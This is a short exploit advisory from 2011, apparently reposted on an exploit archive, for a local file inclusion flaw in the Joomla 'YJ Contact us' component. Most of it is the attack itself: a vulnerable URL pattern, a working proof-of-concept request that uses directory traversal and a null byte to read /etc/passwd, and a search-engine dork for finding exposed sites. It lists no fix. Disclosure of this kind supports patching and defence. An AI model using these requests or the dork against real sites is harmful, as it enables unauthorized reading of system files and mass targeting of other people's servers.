Joomla YJ Contact us Component Local File Inclusion Vulnerability

2011-10-25 18:15:05

================================================================================

- YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability

Software : YJ Contact us - Enhanced Joomla Contact Form
Vendor : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
Author : Mego
Contact : nowar204[at]hotmail[dot]com
Home : NONE

================================================================================

- Exploit

http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]


- PoC

http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00


- Dork

"com_yjcontactus"+view

================================================================================

- Greetz

norgod,g0ld,vnc and all brazilian c0ders

================================================================================

- October 25 2011 - Morocco

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.